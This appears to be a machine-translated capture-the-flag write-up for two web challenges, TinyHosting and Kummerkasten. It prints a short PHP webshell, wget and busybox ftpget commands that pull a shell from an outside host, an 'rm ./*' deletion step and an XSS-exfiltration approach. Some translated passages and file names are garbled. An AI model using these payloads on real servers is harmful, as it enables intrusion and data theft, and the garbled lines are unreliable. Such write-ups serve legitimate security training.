A dog · 2015/12/31 11:57

0 x00 profile


As a sales dog, but also can do Web problems, very happy. This time, I have two topics, one is TinyHosting and the other is Kummerkasten.

0x01 TingHosting


A new file hosting service for very small files. could you pwn it?

http://136.243.194.53/

To find a hidden SRC parameter in the page, add? To the URL. SRC =1 returns the source code for the page.

You can upload files of any name to the server, but each file is only 7 characters long.

The shortest PHP webshell should be the 14 character one:

#! php <? =`$_GET[1]`;Copy the code

(PS: the original code has been changed, if there is an error… Forgive me.

Not long enough, obviously.

And then I had a lot of imagination, and I came up with this lovely * payload, and it’s very important.

#! bash z.phpCopy the code

Content as follows:

#! php <? = ` * `;Copy the code

Just seven characters, no more, no less, to run through everything in the current directory in sequence.

So we have to construct some chain of execution, and the initial idea is:

#! bash busybox ftpget two.dog w.php z.phpCopy the code

The first four files have arbitrary content. The key payload is w.hp. After executing w.hp, the content is overwritten by the Webshell on my server and the webshell is retrieved.

Busybox ftpget supports only IP hosts, not domain names.

Later, I wanted to construct it through WGET, taking advantage of the fact that the 302 jump can cross protocol.

#! bash wget wtf.two.dog z.phpCopy the code

The first two files are payload (z.hp).

On closer inspection, however, this problem creates an index. HTML in each person’s directory, so the execution chain is broken and does not work.

So bash is used to kill index.html first

Structure:

#! bash bash bb index.html z.phpCopy the code

The content of bash is arbitrary, and the content of bb is rm./* with a maximum of 7 characters. Then get a Webshell using the above method and find a flag in the root directory.

Bash, bb and z.hp, bb contents are ls /,cat /f*, simple and direct 0 0

0x02 Kummerkasten


Our Admin is a little sad this time of the year. Maybe you can cheer him up at this site http://136.243.194.46/

Please note: This challenge does not follow the flag format.

Hints:

To build the flag, concatenate both parts and omit ’32C3_’

After entering, there is only one place to submit messages. I looked around and found nothing else. I felt it was related to XSS.

Payload = payload; payload = payload;

Access used to be 403, feeling like I need to use XSS to read the contents of the page.

The original idea is to bring jQuery in XSS and then use jQuery to operate, the result is found in the page, too convenient.

Using Ajax directly, you can easily read pages and post them back.

You see /admin/bugs and /admin/token

According to the information on the page, the key is to read two PNG images back.

The payload at the end is as follows:

Then put the two images, a mysql password and a 6 digit number together to create a FLAG.

0x03 Other

More writeUp can be found at the following link:

Github.com/ctfs/write-…